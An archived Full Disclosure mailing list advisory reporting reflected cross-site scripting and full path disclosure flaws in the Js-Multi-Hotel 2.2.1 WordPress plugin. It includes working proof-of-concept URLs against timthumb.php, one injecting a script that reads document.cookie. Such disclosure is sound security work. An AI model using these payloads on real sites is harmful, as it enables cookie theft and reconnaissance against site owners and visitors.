Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress
From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 29 Mar 2014 16:01:58 +0200

Hello list!

These are vulnerabilities in Js-Multi-Hotel plugin for WordPress.

-------------------------
Affected products:
-------------------------

Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

-------------------------
Affected vendors:
-------------------------

Joomlaskin
http://wordpress.org

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://

I have disclosed it at my site (http://websecurity.com.ua/7082/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


  By Date           By Thread  

Current thread:
  • XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress MustLive (Mar 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]